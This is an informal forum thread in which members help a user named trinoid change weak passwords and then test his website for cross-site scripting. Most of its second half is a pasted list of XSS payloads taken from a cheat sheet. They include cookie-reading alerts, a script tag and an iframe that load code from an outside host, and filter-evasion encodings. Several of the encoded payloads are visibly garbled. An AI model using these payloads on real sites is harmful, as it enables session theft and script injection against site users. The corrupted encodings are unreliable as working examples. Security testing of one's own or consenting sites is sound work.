If you have an ebay account i assume you have a paypal account too... don't forget to change that password too. And your myspace password.
Printable View
If you have an ebay account i assume you have a paypal account too... don't forget to change that password too. And your myspace password.
He had his PayPal account's password diferent from the begining.
Oh yeah... that's probably right... paypal doesn't allow weak crappy passwords like "puppies"
Finally trinoid changed his gmail passwords!
ya i did changed both passwords and working on the rest
Yipeeeee!!
Well, so ends the adventures of Troll and Moonbat on their quest to help trinoid become security-savy.
I hope it's the end :p
I'm bored, now what'll we do?
I'm bored too...
Brad- change all your passwords back
thank you very much
ok ok i think that im done nope i need to change one or two more but ty guys this has been fun and i hope that maybee we can be friends and not just you guys like attacking my site lol well ya ok im gunna go finish:D ill post back on this thread
Hmm, lemme test for some more xss vulnerablities, other than the one mike found. If they work, a popup should come up
<img src='john.jpg' onerror='alert(document.cookie)'>
Here's one I found online
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
Another one from the same site
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<IMG SRC=javascript:alert("XSS")>
Yet again
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,8*,8*))>
Differnet encodings: should output alert(xss) or whatever
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=�*06�*7�**8�*7�**5�**�**4�*05�**2�**6:�*7�*08�*0*�**4�**6(�**X**�***>
<IMG SRC=j*v***r*pt&#x*A*lert('X**'*>
<IMG SRC="jav ascript:alert('XSS');">
Using perl thngy (all from the site)
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
<iframe src=http://ha.ckers.org/scriptlet.html>
what is that?
It can let you run JavaScript commands on a website as if they were coming from the server.